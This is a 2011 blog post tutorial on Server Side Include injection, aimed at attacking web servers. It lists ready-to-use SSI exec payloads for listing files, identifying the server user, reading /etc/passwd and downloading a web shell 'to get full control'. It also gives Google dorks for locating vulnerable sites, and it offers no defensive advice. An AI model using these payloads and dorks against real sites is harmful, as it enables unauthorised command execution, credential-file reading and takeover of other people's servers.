Chitika

Monday, 12 December 2011

server side inclusion


Server Side Includes


What is It?


A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.


What Sites are Vulnerable?


For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.


Testing for SSI Injection


To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request


< !–#exec cmd=”ls” –>


If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into


- Textboxes/search boxes
- Headers
- Cookies
- Address Bar


Useful Commands


Show Files Linux


< !–#exec cmd=”ls” –>


Show Files Windows


< !–#exec cmd=”dir” –>


Read /etc/passwd


<!–#include virtual=”/etc/passwd” –>


What User Is the webserver running on


< !–#exec cmd=”whoami” –>


Download a shell to the server to get full control


< !–#exec cmd=”wget “shell.php”" –>


Dorks


Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection


inurl:index.shtml
inurl:index.shtm
inurl:index.stm


There's many others but you can just use your imagination.


Hope you liked this tutorial.

No comments:

Post a Comment